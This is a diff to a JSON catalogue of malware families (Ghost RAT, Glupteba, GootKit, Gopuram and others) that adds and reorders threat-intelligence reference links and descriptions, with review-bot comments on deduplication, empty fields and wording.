+ "https://hackcon.org/uploads/327/05%20-%20Kwak.pdf",
+ "https://blogs.blackberry.com/en/2021/10/drawing-a-dragon-connecting-the-dots-to-find-apt41"
],
"synonyms": [
"Farfli",
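Review bot: the rewritten Ghost RAT refs list carries duplicate references to the same material, so the additions should be deduplicated before merge: the old Intezer path "https://www.intezer.com/blog-chinaz-relations/" is re-added alongside the new "https://www.intezer.com/blog/malware-analysis/chinaz-relations/", the NCC Group Gh0st RAT write-up appears on both research.nccgroup.com and www.nccgroup.trust, and the Proofpoint "North Korea bitten by Bitcoin bug" report is listed both as the PDF and as the blog post. Keep one URL per source (the current canonical one, or an archived copy where the original is gone, as was done for the Norman "many faces of Gh0st RAT" paper). Separately, nearly every existing ref is removed and re-added in a different position, which buries the genuinely new entries (the MITRE G0026 page and the Symantec Webworm, Zscaler, Avast, WeLiveSecurity NightScout, Botconf 2022, Tencent and Hackcon write-ups); having the generator emit refs in a stable sorted order would make future diffs reviewable.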
@@ -24506,6 +25964,19 @@
"uuid": "225fa6cf-dc9c-4b86-873b-cdf1d9dd3738",
"value": "Ghost RAT"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ghost_secret",
+ "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/analyzing-operation-ghostsecret-attack-seeks-to-steal-data-worldwide/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "0b317327-6783-441f-8634-388599cbbff6",
+ "value": "GhostSecret"
+ },
{
"description": "Ransomware.",
"meta": {
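Review bot: the new GhostSecret entry ships with an empty "description" and an empty "type" list, so the only hint of what this cluster is will be the McAfee URL slug ("analyzing-operation-ghostsecret-attack-seeks-to-steal-data-worldwide"); add at least a one-sentence summary drawn from that reference and set the type where the source supports it. The same gap applies to the GOLDBACKDOOR and Gopuram entries added later in this patch.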
@@ -24550,8 +26021,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.ginzo",
- "https://twitter.com/struppigel/status/1506933328599044100",
"https://ke-la.com/information-stealers-a-new-landscape/",
+ "https://blog.talosintelligence.com/haskers-gang-zingostealer/",
+ "https://twitter.com/struppigel/status/1506933328599044100",
"https://www.govcert.ch/downloads/whitepapers/Unflattening-ConfuserEx-Code-in-IDA.pdf"
],
"synonyms": [],
@@ -24605,25 +26077,27 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.globeimposter",
- "https://blog.360totalsecurity.com/en/globeimposter-which-has-more-than-20-variants-is-still-wildly-growing/",
- "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
- "https://intel471.com/blog/a-brief-history-of-ta505",
- "https://www.emsisoft.com/ransomware-decryption-tools/globeimposter",
"https://www.youtube.com/watch?v=LUxOcpIRxmg",
- "https://www.acronis.com/en-us/blog/posts/globeimposter-ransomware-holiday-gift-necurs-botnet",
- "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf",
- "https://blog.fortinet.com/2017/08/05/analysis-of-new-globeimposter-ransomware-variant",
- "https://www.proofpoint.com/us/threat-insight/post/holiday-lull-not-so-much",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf",
- "https://go.group-ib.com/rs/689-LRE-818/images/Group-IB_Ransomware_whitepaper_eng.pdf",
- "https://www.secureworks.com/research/threat-profiles/gold-swathmore",
- "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/",
- "https://info.phishlabs.com/blog/globe-imposter-ransomware-makes-a-new-run",
- "https://www.bleepingcomputer.com/news/security/new-doc-globeimposter-ransomware-variant-malspam-campaign-underway/",
- "https://isc.sans.edu/diary/23417",
"https://blog.ensilo.com/globeimposter-ransomware-technical",
+ "https://www.acronis.com/en-us/blog/posts/globeimposter-ransomware-holiday-gift-necurs-botnet",
+ "https://www.proofpoint.com/us/threat-insight/post/holiday-lull-not-so-much",
+ "https://blog.fortinet.com/2017/08/05/analysis-of-new-globeimposter-ransomware-variant",
"https://www.crowdstrike.com/blog/ransomware-preparedness-a-call-to-action/",
- "https://asec.ahnlab.com/ko/30284/"
+ "https://asec.ahnlab.com/en/48940/",
+ "https://info.phishlabs.com/blog/globe-imposter-ransomware-makes-a-new-run",
+ "https://blog.360totalsecurity.com/en/globeimposter-which-has-more-than-20-variants-is-still-wildly-growing/",
+ "https://asec.ahnlab.com/ko/30284/",
+ "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/",
+ "https://www.bleepingcomputer.com/news/security/new-doc-globeimposter-ransomware-variant-malspam-campaign-underway/",
+ "https://go.group-ib.com/rs/689-LRE-818/images/Group-IB_Ransomware_whitepaper_eng.pdf",
+ "https://www.emsisoft.com/ransomware-decryption-tools/globeimposter",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf",
+ "https://www.secureworks.com/research/threat-profiles/gold-swathmore",
+ "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf",
+ "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
+ "https://www.sentinelone.com/blog/recent-tzw-campaigns-revealed-as-part-of-globeimposter-malware-family/",
+ "https://intel471.com/blog/a-brief-history-of-ta505",
+ "https://isc.sans.edu/diary/23417"
],
"synonyms": [
"Fake Globe"
@@ -24655,46 +26129,38 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "a379f09b-5cec-4bdb-9735-125cef2de073",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "18208674-fe8c-447f-9e1d-9ff9a64b2370",
"value": "GlooxMail"
},
{
- "description": "",
+ "description": "Glupteba is a trojan horse malware that is one of the top ten malware variants of 2021. After infecting a system, the Glupteba malware can be used to deliver additional malware, steal user authentication information, and enroll the infected system in a cryptomining botnet.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.glupteba",
- "https://www.trendmicro.com/en_us/research/21/j/ransomware-operators-found-using-new-franchise-business-model.html",
- "https://decoded.avast.io/martinhron/meris-and-trickbot-standing-on-the-shoulders-of-giants/",
- "https://community.riskiq.com/article/2a36a7d2/description",
- "https://news.sophos.com/en-us/2020/06/24/glupteba-report/?cmp=30728",
- "https://blog.chainalysis.com/reports/2022-crypto-crime-report-preview-malware/",
- "https://blog.google/technology/safety-security/new-action-combat-cyber-crime/",
- "https://www.welivesecurity.com/2018/03/22/glupteba-no-longer-windigo/",
- "https://www.domaintools.com/resources/blog/identifying-network-infrastructure-related-to-a-who-spoofing-campaign",
- "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf",
- "https://nakedsecurity.sophos.com/2020/06/24/glupteba-the-bot-that-gets-secret-messages-from-the-bitcoin-blockchain/",
- "https://blog.google/threat-analysis-group/disrupting-glupteba-operation/",
- "https://medium.com/csis-techblog/installcapital-when-adware-becomes-pay-per-install-cyber-crime-15516249a451",
- "https://storage.googleapis.com/gweb-uniblog-publish-prod/documents/1_Complaint.pdf",
- "http://resources.infosecinstitute.com/tdss4-part-1/",
+ "https://www.welivesecurity.com/2014/03/18/operation-windigo-the-vivisection-of-a-large-linux-server-side-credential-stealing-malware-campaign/",
"https://habr.com/ru/company/solarsecurity/blog/578900/",
- "https://thehackernews.com/2022/03/over-200000-microtik-routers-worldwide.html",
- "https://www.welivesecurity.com/2011/03/02/tdl4-and-glubteba-piggyback-piggybugs/",
- "https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/",
+ "https://www.nozominetworks.com/blog/tracking-malicious-glupteba-activity-through-the-blockchain/",
+ "https://storage.googleapis.com/gweb-uniblog-publish-prod/documents/1_Complaint.pdf",
"https://dissectingmalwa.re/the-blame-game-about-false-flags-and-overwritten-mbrs.html",
"https://blog.trendmicro.com/trendlabs-security-intelligence/glupteba-campaign-hits-network-routers-and-updates-cc-servers-with-data-from-bitcoin-transactions/",
- "https://www.welivesecurity.com/2014/03/18/operation-windigo-the-vivisection-of-a-large-linux-server-side-credential-stealing-malware-campaign/",
+ "https://news.sophos.com/en-us/2020/06/24/glupteba-report/?cmp=30728",
+ "https://www.welivesecurity.com/2011/03/02/tdl4-and-glubteba-piggyback-piggybugs/",
+ "https://www.domaintools.com/resources/blog/identifying-network-infrastructure-related-to-a-who-spoofing-campaign",
+ "https://medium.com/csis-techblog/installcapital-when-adware-becomes-pay-per-install-cyber-crime-15516249a451",
+ "https://community.riskiq.com/article/2a36a7d2/description",
+ "https://blog.chainalysis.com/reports/2022-crypto-crime-report-preview-malware/",
+ "https://blog.google/technology/safety-security/new-action-combat-cyber-crime/",
+ "https://blog.google/threat-analysis-group/disrupting-glupteba-operation/",
+ "https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/",
+ "https://nakedsecurity.sophos.com/2020/06/24/glupteba-the-bot-that-gets-secret-messages-from-the-bitcoin-blockchain/",
"https://labs.k7computing.com/?p=22319",
+ "https://www.welivesecurity.com/2018/03/22/glupteba-no-longer-windigo/",
+ "http://resources.infosecinstitute.com/tdss4-part-1/",
"https://krebsonsecurity.com/2022/06/the-link-between-awm-proxy-the-glupteba-botnet/?utm_source=dlvr.it&utm_medium=twitter",
+ "https://thehackernews.com/2022/03/over-200000-microtik-routers-worldwide.html",
+ "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf",
+ "https://decoded.avast.io/martinhron/meris-and-trickbot-standing-on-the-shoulders-of-giants/",
+ "https://www.trendmicro.com/en_us/research/21/j/ransomware-operators-found-using-new-franchise-business-model.html",
"https://www.bitdefender.com/files/News/CaseStudies/study/400/Bitdefender-PR-Whitepaper-MosaicLoader-creat5540-en-EN.pdf"
],
"synonyms": [],
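Review bot: the "related" block on GlooxMail (the "similar" link to dest-uuid a379f09b-5cec-4bdb-9735-125cef2de073, tagged almost-certain) is deleted with nothing replacing it, and the same happens to Goggles, GoldMax and GootKit further down; if this is a deliberate change in how the galaxy is generated, say so in the commit message, otherwise these cross-cluster links are dropped silently and consumers that rely on them lose the link. On the Glupteba description, "one of the top ten malware variants of 2021" is a dated ranking stated without attribution; either tie it to one of the listed refs or drop the ranking and keep the capability summary (delivery of additional malware, credential theft, enrollment in a cryptomining botnet).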
@@ -24722,8 +26188,8 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.gocryptolocker",
"https://id-ransomware.blogspot.com/2020/04/gocryptolocker-ransomware.html",
- "https://github.com/LimerBoy/goCryptoLocker/blob/master/main.go",
- "https://twitter.com/GrujaRS/status/1254657823478353920"
+ "https://twitter.com/GrujaRS/status/1254657823478353920",
+ "https://github.com/LimerBoy/goCryptoLocker/blob/master/main.go"
],
"synonyms": [],
"type": []
@@ -24736,9 +26202,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.godlike12",
- "https://securelist.com/apt-trends-report-q2-2020/97937/",
"https://www.volexity.com/blog/2020/03/31/storm-cloud-unleashed-tibetan-community-focus-of-highly-targeted-fake-flash-campaign/",
- "https://securelist.com/holy-water-ongoing-targeted-water-holing-attack-in-asia/96311/"
+ "https://securelist.com/holy-water-ongoing-targeted-water-holing-attack-in-asia/96311/",
+ "https://securelist.com/apt-trends-report-q2-2020/97937/"
],
"synonyms": [
"GOSLU"
@@ -24800,15 +26266,6 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "4bc55eb3-7c92-4668-a75a-d5e291387613",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "7d89e8dc-4999-47e9-b497-b476e368a8d2",
"value": "Goggles"
},
@@ -24827,13 +26284,26 @@
"uuid": "034a3db0-b53c-4ec1-9390-4b6f214e1233",
"value": "GoGoogle"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.goldbackdoor",
+ "https://stairwell.com/wp-content/uploads/2022/04/Stairwell-threat-report-The-ink-stained-trail-of-GOLDBACKDOOR.pdf"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "54f5cf02-6fdc-43b4-af06-87af1a901264",
+ "value": "GOLDBACKDOOR"
+ },
{
"description": "",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.goldeneye",
- "https://blog.malwarebytes.com/threat-analysis/2016/12/goldeneye-ransomware-the-petyamischa-combo-rebranded/",
- "https://blog.malwarebytes.com/cybercrime/2017/07/keeping-up-with-the-petyas-demystifying-the-malware-family/"
+ "https://blog.malwarebytes.com/cybercrime/2017/07/keeping-up-with-the-petyas-demystifying-the-malware-family/",
+ "https://blog.malwarebytes.com/threat-analysis/2016/12/goldeneye-ransomware-the-petyamischa-combo-rebranded/"
],
"synonyms": [
"Petya/Mischa"
@@ -24848,8 +26318,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.goldenhelper",
- "https://tomiwa-xy.medium.com/static-analysis-of-goldenhelper-malware-golden-tax-malware-d9f85a88e74d",
- "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/goldenspy-chapter-4-goldenhelper-malware-embedded-in-official-golden-tax-software/"
+ "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/goldenspy-chapter-4-goldenhelper-malware-embedded-in-official-golden-tax-software/",
+ "https://tomiwa-xy.medium.com/static-analysis-of-goldenhelper-malware-golden-tax-malware-d9f85a88e74d"
],
"synonyms": [],
"type": []
@@ -24862,15 +26332,15 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.goldenspy",
- "https://www.atlanticcouncil.org/wp-content/uploads/2020/07/Breaking-trust-Shades-of-crisis-across-an-insecure-software-supply-chain.pdf",
- "https://www.ic3.gov/Media/News/2020/201103-1.pdf",
- "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/goldenspy-chapter-4-goldenhelper-malware-embedded-in-official-golden-tax-software/",
+ "https://www.bka.de/SharedDocs/Downloads/DE/IhreSicherheit/Warnhinweise/WarnhinweisGOLDENSPY.pdf",
"https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/goldenspy-chapter-two-the-uninstaller/",
- "https://trustwave.azureedge.net/media/16908/the-golden-tax-department-and-emergence-of-goldenspy-malware.pdf",
- "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/the-golden-tax-department-and-the-emergence-of-goldenspy-malware/",
- "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/goldenspy-chapter-3-new-and-improved-uninstaller/",
"https://www.ic3.gov/media/news/2020/200728.pdf",
- "https://www.bka.de/SharedDocs/Downloads/DE/IhreSicherheit/Warnhinweise/WarnhinweisGOLDENSPY.pdf"
+ "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/goldenspy-chapter-3-new-and-improved-uninstaller/",
+ "https://trustwave.azureedge.net/media/16908/the-golden-tax-department-and-emergence-of-goldenspy-malware.pdf",
+ "https://www.atlanticcouncil.org/wp-content/uploads/2020/07/Breaking-trust-Shades-of-crisis-across-an-insecure-software-supply-chain.pdf",
+ "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/goldenspy-chapter-4-goldenhelper-malware-embedded-in-official-golden-tax-software/",
+ "https://www.ic3.gov/Media/News/2020/201103-1.pdf",
+ "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/the-golden-tax-department-and-the-emergence-of-goldenspy-malware/"
],
"synonyms": [],
"type": []
@@ -24883,30 +26353,22 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.goldmax",
- "https://umbrella.cisco.com/blog/cybersecurity-threat-spotlight-backdoors-rats-loaders-evasion-techniques",
- "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf",
"https://us-cert.cisa.gov/ncas/analysis-reports/ar21-105a",
- "https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-APT-attacks-on-industrial-organizations-in-H1-2021-En.pdf",
- "https://securelist.com/extracting-type-information-from-go-binaries/104715/",
"https://www.cisa.gov/uscert/ncas/alerts/aa22-110a",
+ "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf",
+ "https://umbrella.cisco.com/blog/cybersecurity-threat-spotlight-backdoors-rats-loaders-evasion-techniques",
+ "https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-APT-attacks-on-industrial-organizations-in-H1-2021-En.pdf",
"https://x0r19x91.gitlab.io/post/malware-analysis/sunshuttle/",
- "https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/",
- "https://www.crowdstrike.com/blog/observations-from-the-stellarparticle-campaign/"
+ "https://securelist.com/tomiris-called-they-want-their-turla-malware-back/109552/",
+ "https://securelist.com/extracting-type-information-from-go-binaries/104715/",
+ "https://www.crowdstrike.com/blog/observations-from-the-stellarparticle-campaign/",
+ "https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/"
],
"synonyms": [
"SUNSHUTTLE"
],
"type": []
},
- "related": [
- {
- "dest-uuid": "1e912590-c879-4a9c-81b9-2d31e82ac718",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "9a3429d7-e4a8-43c5-8786-0b3a1c841a5f",
"value": "GoldMax"
},
@@ -24915,11 +26377,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.gold_dragon",
- "https://www.cybereason.com/blog/back-to-the-future-inside-the-kimsuky-kgh-spyware-suite",
- "https://i.blackhat.com/asia-21/Friday-Handouts/as-21-Kuo-We-Are-About-To-Land-How-CloudDragon-Turns-A-Nightmare-Into-Reality.pdf",
+ "https://blog.talosintelligence.com/2021/11/kimsuky-abuses-blogs-delivers-malware.html",
"https://www.youtube.com/watch?v=rfzmHjZX70s",
"https://asec.ahnlab.com/en/31089/",
- "https://blog.talosintelligence.com/2021/11/kimsuky-abuses-blogs-delivers-malware.html"
+ "https://www.cybereason.com/blog/back-to-the-future-inside-the-kimsuky-kgh-spyware-suite",
+ "https://i.blackhat.com/asia-21/Friday-Handouts/as-21-Kuo-We-Are-About-To-Land-How-CloudDragon-Turns-A-Nightmare-Into-Reality.pdf"
],
"synonyms": [
"Lovexxx"
@@ -24960,8 +26422,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.gomorrah_stealer",
- "https://github.com/jstrosch/malware-samples/tree/master/binaries/gomorrah/2020/April",
- "https://twitter.com/vxunderground/status/1469713783308357633"
+ "https://twitter.com/vxunderground/status/1469713783308357633",
+ "https://github.com/jstrosch/malware-samples/tree/master/binaries/gomorrah/2020/April"
],
"synonyms": [],
"type": []
@@ -24974,9 +26436,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.goodor",
- "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/dragonfly-energy-sector-cyber-attacks",
"https://norfolkinfosec.com/a-new-look-at-old-dragonfly-malware-goodor/",
- "https://www.ncsc.gov.uk/alerts/hostile-state-actors-compromising-uk-organisations-focus-engineering-and-industrial-control"
+ "https://www.ncsc.gov.uk/alerts/hostile-state-actors-compromising-uk-organisations-focus-engineering-and-industrial-control",
+ "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/dragonfly-energy-sector-cyber-attacks"
],
"synonyms": [
"Fuerboos"
@@ -25013,45 +26475,47 @@
"value": "GooPic Drooper"
},
{
- "description": "Gootkit is a banking trojan, where large parts are written in javascript (node.JS). It jumps to C/C++-library functions for various tasks.",
+ "description": "Gootkit is a banking trojan consisting of an x86 loader and a payload embedding nodejs as well as a set of js scripts. The loader downloads the payload, stores it in registry and injects it in a copy of the loader process. The loader also contains two encrypted DLLs intended to be injected into each browser process launched in order to place the payload in man in the browser and allow it to apply the webinjects received from the command and control server on HTTPx exchanges. This allows Gootkit to intercept HTTPx requests and responses, steal their content or modify it according to the webinjects.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.gootkit",
- "https://labs.sentinelone.com/gootkit-banking-trojan-deep-dive-anti-analysis-features/",
- "https://www.certego.net/en/news/malware-tales-gootkit/",
- "https://www.youtube.com/watch?v=242Tn0IL2jE",
- "https://dannyquist.github.io/gootkit-reversing-ghidra/",
- "https://www.s21sec.com/en/blog/2016/05/reverse-engineering-gootkit/",
- "https://www.us-cert.gov/ncas/alerts/TA16-336A",
- "https://blog.malwarebytes.com/threat-analysis/2020/11/german-users-targeted-with-gootkit-banker-or-revil-ransomware/",
- "https://www.sentinelone.com/blog/gootkit-banking-trojan-deep-dive-anti-analysis-features/",
- "https://securityintelligence.com/gootkit-bobbing-and-weaving-to-avoid-prying-eyes/",
- "https://connect.ed-diamond.com/MISC/MISC-100/Analyse-du-malware-bancaire-Gootkit-et-de-ses-mecanismes-de-protection",
- "https://www.trendmicro.com/en_us/research/20/l/investigating-the-gootkit-loader.html",
- "https://www.youtube.com/watch?v=QgUlPvEE4aw",
- "https://www.sentinelone.com/blog/gootkit-banking-trojan-persistence-other-capabilities/",
- "https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/",
- "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
- "https://unit42.paloaltonetworks.com/wireshark-tutorial-emotet-infection/",
- "http://blog.cert.societegenerale.com/2015/04/analyzing-gootkits-persistence-mechanism.html",
- "https://securelist.com/gootkit-the-cautious-trojan/102731/",
- "https://news.sophos.com/en-us/2021/03/01/gootloader-expands-its-payload-delivery-options/?cmp=30728",
- "https://news.drweb.com/show/?i=4338&lng=en",
- "https://www.f5.com/labs/articles/threat-intelligence/tackling-gootkit-s-traps",
- "http://www.vkremez.com/2018/04/lets-learn-in-depth-dive-into-gootkit.html",
- "https://securityintelligence.com/gootkit-developers-dress-it-up-with-web-traffic-proxy/",
- "https://twitter.com/jhencinski/status/1464268732096815105",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
- "https://blogs.blackberry.com/en/2020/04/threat-spotlight-gootkit-banking-trojan",
- "https://blogs.blackberry.com/en/2021/11/revil-under-the-microscope",
- "https://twitter.com/MsftSecIntel/status/1366542130731094021",
- "https://resource.redcanary.com/rs/003-YRU-314/images/2022_ThreatDetectionReport_RedCanary.pdf",
- "https://dissectingmalwa.re/nicht-so-goot-breaking-down-gootkit-and-jasper-ftcode.html",
- "https://securelist.com/blog/research/76433/inside-the-gootkit-cc-server/",
- "https://www.trendmicro.com/en_us/research/22/g/gootkit-loaders-updated-tactics-and-fileless-delivery-of-cobalt-strike.html",
"https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries/blob/master/Delivery/Gootkit-malware.md",
+ "https://securelist.com/gootkit-the-cautious-trojan/102731/",
+ "https://www.trendmicro.com/en_us/research/22/g/gootkit-loaders-updated-tactics-and-fileless-delivery-of-cobalt-strike.html",
+ "https://www.certego.net/en/news/malware-tales-gootkit/",
+ "https://www.trendmicro.com/en_us/research/20/l/investigating-the-gootkit-loader.html",
"http://blog.trendmicro.com/trendlabs-security-intelligence/fake-judicial-spam-leads-to-backdoor-with-fake-certificate-authority/",
- "https://forums.juniper.net/t5/Security-Now/New-Gootkit-Banking-Trojan-variant-pushes-the-limits-on-evasive/ba-p/319055"
+ "https://5556002.fs1.hubspotusercontent-na1.net/hubfs/5556002/2022%20PDF%20Download%20Assets/ADA%20Compliant%20pdfs/Reports/PUBLIC_Gootloader%20-%20Foreign%20Intelligence%20Service.pdf",
+ "https://securityintelligence.com/gootkit-developers-dress-it-up-with-web-traffic-proxy/",
+ "https://www.sentinelone.com/blog/gootkit-banking-trojan-deep-dive-anti-analysis-features/",
+ "https://www.sentinelone.com/blog/gootkit-banking-trojan-persistence-other-capabilities/",
+ "https://blogs.blackberry.com/en/2021/11/revil-under-the-microscope",
+ "https://dissectingmalwa.re/nicht-so-goot-breaking-down-gootkit-and-jasper-ftcode.html",
+ "https://twitter.com/MsftSecIntel/status/1366542130731094021",
+ "https://www.trendmicro.com/en_us/research/23/a/gootkit-loader-actively-targets-the-australian-healthcare-indust.html",
+ "https://blog.malwarebytes.com/threat-analysis/2020/11/german-users-targeted-with-gootkit-banker-or-revil-ransomware/",
+ "https://www.youtube.com/watch?v=QgUlPvEE4aw",
+ "https://securelist.com/blog/research/76433/inside-the-gootkit-cc-server/",
+ "https://www.youtube.com/watch?v=242Tn0IL2jE",
+ "https://connect.ed-diamond.com/MISC/MISC-100/Analyse-du-malware-bancaire-Gootkit-et-de-ses-mecanismes-de-protection",
+ "https://dannyquist.github.io/gootkit-reversing-ghidra/",
+ "https://news.drweb.com/show/?i=4338&lng=en",
+ "https://unit42.paloaltonetworks.com/wireshark-tutorial-emotet-infection/",
+ "https://securityintelligence.com/gootkit-bobbing-and-weaving-to-avoid-prying-eyes/",
+ "https://forums.juniper.net/t5/Security-Now/New-Gootkit-Banking-Trojan-variant-pushes-the-limits-on-evasive/ba-p/319055",
+ "https://blogs.blackberry.com/en/2020/04/threat-spotlight-gootkit-banking-trojan",
+ "http://www.vkremez.com/2018/04/lets-learn-in-depth-dive-into-gootkit.html",
+ "https://www.s21sec.com/en/blog/2016/05/reverse-engineering-gootkit/",
+ "https://resource.redcanary.com/rs/003-YRU-314/images/2022_ThreatDetectionReport_RedCanary.pdf",
+ "http://blog.cert.societegenerale.com/2015/04/analyzing-gootkits-persistence-mechanism.html",
+ "https://twitter.com/jhencinski/status/1464268732096815105",
+ "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
+ "https://www.f5.com/labs/articles/threat-intelligence/tackling-gootkit-s-traps",
+ "https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/",
+ "https://labs.sentinelone.com/gootkit-banking-trojan-deep-dive-anti-analysis-features/",
+ "https://www.us-cert.gov/ncas/alerts/TA16-336A",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
+ "https://news.sophos.com/en-us/2021/03/01/gootloader-expands-its-payload-delivery-options/?cmp=30728"
],
"synonyms": [
"Waldek",
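Review bot: the new Gootkit description needs a wording pass before merge: "HTTPx exchanges" / "HTTPx requests" is not a standard term (write "HTTP and HTTPS" or "HTTP(S)"), "man in the browser" should be hyphenated as "man-in-the-browser", "stores it in registry" should read "in the registry", and "nodejs" / "js scripts" would be clearer as "Node.js" / "JavaScript". In the refs, the SentinelOne deep-dive is listed twice (labs.sentinelone.com and www.sentinelone.com, same article), and the new Gootloader report is referenced through a raw HubSpot CDN path ("https://5556002.fs1.hubspotusercontent-na1.net/...") that is likely to rot; prefer the publisher's landing page or an archived copy.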
@@ -25060,15 +26524,6 @@
],
"type": []
},
- "related": [
- {
- "dest-uuid": "07ffcf9f-b9c0-4b22-af4b-78527427e6f5",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "329efac7-922e-4d8b-90a9-4a87c3281753",
"value": "GootKit"
},
@@ -25086,6 +26541,20 @@
"uuid": "fb2e42bf-6845-4eb3-9fe7-85a447762bce",
"value": "Gophe"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gopuram",
+ "https://twitter.com/kucher1n/status/1642886340105601029?t=3GCn-ZhDjqWEMXya_PKseg",
+ "https://securelist.com/gopuram-backdoor-deployed-through-3cx-supply-chain-attack/109344"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "6dc4e71e-7372-4287-bdee-04da17a0d275",
+ "value": "Gopuram"
+ },
{
"description": "",
"meta": {
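Review bot: the Twitter reference in the new Gopuram entry carries a per-share tracking token ("?t=3GCn-ZhDjqWEMXya_PKseg") that identifies the share, not the post; strip it so the ref is the canonical status URL "https://twitter.com/kucher1n/status/1642886340105601029" and stays deduplicable against other entries. The unchanged Krebs on Security URL under Glupteba ("?utm_source=dlvr.it&utm_medium=twitter") and the Sophos "?cmp=30728" links under Glupteba and GootKit would benefit from the same cleanup.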
@@ -25117,23 +26586,25 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.gozi",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
"https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html",
- "https://securelist.com/financial-cyberthreats-in-2020/101638/",
- "https://therecord.media/gozi-malware-gang-member-arrested-in-colombia/",
- "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
- "http://blog.malwaremustdie.org/2013/02/the-infection-of-styx-exploit-kit.html",
- "https://www.secureworks.com/research/threat-profiles/gold-swathmore",
- "https://www.youtube.com/watch?v=BcFbkjUVc7o",
- "https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/",
"https://0xc0decafe.com/malware-analyst-guide-to-pe-timestamps/",
- "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree",
- "https://github.com/mlodic/ursnif_beacon_decryptor",
